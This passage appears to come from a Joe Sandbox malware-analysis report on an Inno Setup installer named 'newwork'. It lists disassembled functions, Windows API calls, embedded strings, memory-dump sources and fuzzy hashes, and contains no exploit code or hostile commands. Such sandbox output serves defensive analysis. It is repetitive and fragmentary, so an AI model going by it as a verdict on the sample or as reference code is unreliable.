                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Placement$Iconic
                                                                                • String ID:
                                                                                • API String ID: 568898626-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CaptureIconic
                                                                                • String ID:
                                                                                • API String ID: 2277910766-0
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 0042419B
                                                                                  • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                  • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                  • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                  • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                  • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                • String ID:
                                                                                • API String ID: 2671590913-0
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                APIs
                                                                                • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CryptFour
                                                                                • String ID:
                                                                                • API String ID: 2153018856-0
                                                                                APIs
                                                                                • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CryptFour
                                                                                • String ID:
                                                                                • API String ID: 2153018856-0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2576788152.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000001.00000002.2576760974.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000001.00000002.2576812745.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_10000000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2576788152.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000001.00000002.2576760974.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000001.00000002.2576812745.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_10000000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                • Instruction Fuzzy Hash:
                                                                                APIs
                                                                                  • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadVersion
                                                                                • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                • API String ID: 1968650500-2910565190
                                                                                • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0041CA40
                                                                                • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                Similarity
                                                                                • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                • String ID:
                                                                                • API String ID: 269503290-0
                                                                                • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                Strings
                                                                                • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                • IPropertyStore::Commit, xrefs: 004568E3
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                • {pf32}\, xrefs: 0045671E
                                                                                • CoCreateInstance, xrefs: 004566AF
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                • IPersistFile::Save, xrefs: 00456962
                                                                                • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                Similarity
                                                                                • API ID: CreateInstance$FreeString
                                                                                • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                • API String ID: 308859552-2363233914
                                                                                • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                APIs
                                                                                • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                • API String ID: 2000705611-3672972446
                                                                                • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,0045A994), ref: 0045A846
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                • API String ID: 1452528299-3112430753
                                                                                • Opcode ID: 897371adc22cb023c4f91e5d84e86364b249416017dada323b4764b4a4f9f98f
                                                                                • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                • Opcode Fuzzy Hash: 897371adc22cb023c4f91e5d84e86364b249416017dada323b4764b4a4f9f98f
                                                                                • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                APIs
                                                                                • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                  • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                • API String ID: 59345061-4263478283
                                                                                • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                APIs
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                • GetDC.USER32(00000000), ref: 0041B402
                                                                                • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                • String ID:
                                                                                • API String ID: 644427674-0
                                                                                • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                APIs
                                                                                  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                • API String ID: 971782779-3668018701
                                                                                • Opcode ID: ec03a6b44b0f4cd57b1805575295038081ef414545ebdff26f55f13b118b0783
                                                                                • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                • Opcode Fuzzy Hash: ec03a6b44b0f4cd57b1805575295038081ef414545ebdff26f55f13b118b0783
